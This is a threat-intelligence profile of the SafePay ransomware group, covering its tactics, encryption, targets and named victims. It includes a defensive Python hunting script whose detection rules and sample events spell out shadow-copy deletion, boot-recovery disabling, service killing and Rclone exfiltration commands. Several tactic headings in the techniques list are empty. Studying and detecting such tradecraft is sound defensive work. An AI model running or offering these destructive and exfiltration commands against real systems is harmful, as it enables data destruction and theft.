SafePay
SafePay is a ransomware operation that emerged in late 2024, first observed around September-October 2024. Multiple sources describe it as a private, centralized, closed operation rather than a ransomware-as-a-service program; the group itself states on its leak site that it has never provided RaaS. SafePay uses double extortion, stealing data before encrypting systems and pressuring victims through a Tor-based leak site; reporting notes that the victims listed there are generally those that did not pay. It has been described as one of the most active ransomware groups in 2025 and early 2026, with hundreds of claimed victims: reports counted more than 260 and, later, more than 450 victims on its leak site.
Behaviorally, SafePay attacks are described as fast-moving, often progressing from initial access to encryption within 24 hours. Reported initial access vectors include compromised credentials on VPN gateways and RDP servers, and misconfigured FortiGate firewalls where MFA was not enforced. Persistence and remote access have involved QDoor and ScreenConnect. Discovery and lateral movement have used ShareFinder.ps1, PsExec, WinRM, administrative utilities, and LOLBins. Defense evasion and impact behaviors include terminating antivirus, database, and backup processes, deleting Volume Shadow Copies, and modifying boot configuration to inhibit recovery. The ransomware is described as a Windows PE32 DLL that requires specific command-line arguments, including a mandatory 32-byte password, which also means a sample will not detonate in a sandbox unless that argument is supplied. Encryption reportedly uses AES or ChaCha20 for file contents, with the file key protected by RSA or x25519; it employs intermittent (block) encryption for speed, appends the .safepay extension, and appends metadata containing the encrypted key and a validation hash. Data theft has been conducted with WinRAR, FileZilla, Rclone, and 7-Zip. A kill switch prevents execution on systems with a Cyrillic keyboard layout installed (Russian, Ukrainian, or Belarusian).
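The behaviors above (share discovery with ShareFinder.ps1, PsExec and WinRM for lateral movement, Rclone for exfiltration, process termination, shadow copy deletion, boot configuration tampering, and the under-24-hour timeline) are what a hunter would look for in process-creation telemetry. The script below is an added example, not SafePay's code and not any vendor's published rule set. Its command-line patterns are generic Windows and LOLBin commands commonly associated with each behavior; the page does not reproduce SafePay's actual command lines, so the patterns, the ATT&CK IDs other than T1078.002, and the hostnames, users, and timestamps in the sample events are assumptions to be tuned against your own Sysmon EID 1 or Security 4688 data.

```python
"""Hunt for SafePay-style tradecraft in process-creation telemetry.

Added example: not SafePay's code and not any vendor's published rules. The
command-line patterns are generic Windows / LOLBin commands commonly tied to
each behavior; SafePay's actual command lines are not reproduced on the page,
so treat patterns, hostnames, users and timestamps below as constructed
assumptions to tune against real telemetry (Sysmon EID 1 / Security 4688).
"""
import re
from datetime import datetime
from typing import NamedTuple


class Rule(NamedTuple):
    name: str
    attack_id: str   # standard ATT&CK IDs chosen here, not taken from the page
    stage: str       # discovery | lateral | exfil | impact
    pattern: re.Pattern


RULES = [
    Rule("Volume Shadow Copy deletion", "T1490", "impact",
         re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows|\bwmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    Rule("Boot configuration tampering", "T1490", "impact",
         re.compile(r"\bbcdedit(\.exe)?\b.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    Rule("Backup/AV/database process or service stop", "T1489", "impact",
         re.compile(r"(\btaskkill(\.exe)?\s+.*/im\s+|\bnet(\.exe)?\s+stop\s+|\bsc(\.exe)?\s+stop\s+)"
                    r".*?(sql|veeam|backup|defend|msmpeng|acronis|oracle)", re.I)),
    Rule("Network share discovery (ShareFinder)", "T1135", "discovery",
         re.compile(r"sharefinder\.ps1|invoke-sharefinder", re.I)),
    Rule("Remote execution via PsExec", "T1569.002", "lateral",
         re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I)),
    Rule("Remote execution via WinRM", "T1021.006", "lateral",
         re.compile(r"\bwinrs(\.exe)?\b|enter-pssession|invoke-command\s+.*-computername", re.I)),
    Rule("Staging / exfiltration tooling", "T1567.002", "exfil",
         re.compile(r"\brclone(\.exe)?\b|\bfilezilla|\b(winrar|rar)(\.exe)?\s+a\b|\b7z(a|\.exe)?\s+a\b", re.I)),
]

# Constructed sample events (not real telemetry): ISO timestamp | host | user | command line
SAMPLE_EVENTS = r"""
2025-01-10T02:14:05Z|FW-VPN-GW|svc_backup|cmd.exe /c whoami
2025-01-10T02:31:40Z|WS-0142|svc_backup|powershell.exe -ep bypass -f C:\Users\Public\ShareFinder.ps1
2025-01-10T03:05:12Z|WS-0142|CORP\da_admin|C:\Tools\PsExec64.exe \\SRV-DC01 -s cmd.exe
2025-01-10T05:47:51Z|SRV-FILE01|CORP\da_admin|rclone.exe copy D:\Shares remote:bucket --transfers 32
2025-01-10T09:12:03Z|SRV-FILE01|CORP\da_admin|taskkill /f /im sqlservr.exe
2025-01-10T09:12:05Z|SRV-FILE01|CORP\da_admin|vssadmin.exe delete shadows /all /quiet
2025-01-10T09:12:06Z|SRV-FILE01|CORP\da_admin|bcdedit /set {default} recoveryenabled no
2025-01-10T09:30:00Z|SRV-FILE01|CORP\da_admin|notepad.exe C:\readme.txt
"""


class Event(NamedTuple):
    ts: datetime
    host: str
    user: str
    cmdline: str


class Finding(NamedTuple):
    ts: datetime
    host: str
    user: str
    rule: str
    attack_id: str
    stage: str
    cmdline: str


def parse_events(text: str) -> list:
    """Parse the pipe-delimited sample format into Event records."""
    events = []
    for line in text.strip().splitlines():
        ts, host, user, cmd = line.split("|", 3)
        events.append(Event(datetime.fromisoformat(ts.replace("Z", "+00:00")), host, user, cmd))
    return events


def hunt(events: list) -> list:
    """Apply each rule to every command line; first matching rule wins per event."""
    findings = []
    for ev in events:
        for rule in RULES:
            if rule.pattern.search(ev.cmdline):
                findings.append(Finding(ev.ts, ev.host, ev.user, rule.name, rule.attack_id, rule.stage, ev.cmdline))
                break
    return findings


def summarize(findings: list) -> dict:
    """Campaign-level view: stages seen, hosts touched, and hours from the first
    suspicious event to the first impact-stage action (the sub-24h pattern)."""
    if not findings:
        return {"stages": [], "hosts": [], "hours_to_impact": None, "fast_moving": False}
    ordered = sorted(findings, key=lambda f: f.ts)
    impact = [f for f in ordered if f.stage == "impact"]
    hours = (impact[0].ts - ordered[0].ts).total_seconds() / 3600 if impact else None
    return {
        "stages": sorted({f.stage for f in ordered}),
        "hosts": sorted({f.host for f in ordered}),
        "hours_to_impact": hours,
        "fast_moving": hours is not None and hours < 24,
    }


if __name__ == "__main__":
    found = hunt(parse_events(SAMPLE_EVENTS))
    for f in found:
        print(f"{f.ts:%H:%M:%S} {f.host:<10} {f.attack_id:<9} {f.rule}: {f.cmdline}")
    print(summarize(found))
```

On the constructed sample the script flags six of the eight events and reports roughly 6.7 hours from the ShareFinder run to the first impact action, well inside the 24-hour window the reporting describes. The impact-stage rules (shadow copy deletion, boot configuration tampering, service stops) are the ones worth alerting on in near real time; the discovery and lateral-movement rules are noisier and belong in a hunt query keyed on the same user moving across hosts.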
SafePay has targeted organizations across multiple countries, including Australia, the United States, the United Kingdom, Italy, New Zealand, Canada, Belgium, Brazil, Germany, Barbados, and Argentina. Reporting specifically highlights targeting of managed service providers and small-to-midsize businesses, and repeated activity against healthcare. Healthcare-focused reporting identifies SafePay among the most prolific ransomware strains targeting healthcare providers in 2025, and Health-ISAC describes SAFEPAY as focused on financial disruption, targeting healthcare billing and revenue-cycle systems and threatening exposure of billing records and patient financial data.
Victims and incidents named in the reporting include Conduent, Ingram Micro, Favelle Favco, Genealogy SA, and Smile Team Orthodontics. In the Conduent intrusion of January 2025, SafePay claimed to have stolen more than 8 TB of data; Conduent confirmed that data on over 25 million individuals was stolen, including names, Social Security numbers, and medical or health insurance information, and the incident caused government service outages. In the July 2025 Ingram Micro incident, SafePay was reported as the responsible group, later claimed the attack on its leak site, and alleged theft of 3.5 TB of documents; Ingram Micro disclosed that more than 42,000 individuals were affected and that the stolen files included employment and applicant records with names, contact information, dates of birth, Social Security numbers, driver's license numbers, passport numbers, and employment-related evaluations. SafePay also listed Favelle Favco and Genealogy SA on its leak site and published data it claimed to have stolen from them, including business, financial, insurance, correspondence, technical, maintenance, and identity-document data.
Across the reporting, SafePay is consistently characterized as a significant ransomware threat with strong operational security, centralized control of infrastructure and negotiations, and sustained activity through 2025 into 2026.
Techniques & procedures
10 distinct techniques documented for this family, organized by ATT&CK tactic. T1078.002 is listed under four tactics because ATT&CK maps Valid Accounts to Initial Access, Persistence, Privilege Escalation, and Defense Evasion; the same observation supports each entry.
Initial Access (2 techniques)
T1078.002 - Valid Accounts: Domain Accounts. The Threat Actor was able to gain access to a local account through a simple misconfiguration of the firewall. Once inside, the Threat Actor was able to escalate to a domain administrator account not covered by MFA at the time of the attack.
Execution (1 technique)
Persistence (1 technique)
T1078.002 - Valid Accounts: Domain Accounts (same observation as under Initial Access).
Privilege Escalation (2 techniques)
T1078.002 - Valid Accounts: Domain Accounts (same observation as under Initial Access).
Defense Evasion (1 technique)
T1078.002 - Valid Accounts: Domain Accounts (same observation as under Initial Access).
Discovery (2 techniques)
Lateral Movement (1 technique)
Impact (3 techniques)
On the ransomware front, attribution remains consistent, and the most prevalent ransomware brands we saw deployed mirror those most often seen by other threat intelligence sources. Akira ... and Qilin ... led the way, followed by SafePay, Inc, and Play.
IOCs tracked for this family
7 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering IPs, domains, and DNS infrastructure linked to this family; file hashes (MD5, SHA-1, SHA-256) from samples and reports; and other indicator types observed in public reporting. Full values are available in Mallory.
Recent activity
39 sources tracked across advisories, community write-ups, and news.
A centralized non-RaaS ransomware operation whose activity sharply declined after its data leak site became inactive.
Ransomware family/group associated with data theft and extortion, operating its own leak site and claiming numerous victims across multiple countries. Reporting states it is not a ransomware-as-a-service operation.
SafePay is a ransomware/extortion operation first observed in October 2024 that has claimed hundreds of victims across multiple countries and publicly leaks stolen victim data on its darknet leak site.
Named as one of the dominant ransomware operations by victim volume in Q1 2026 for comparative context.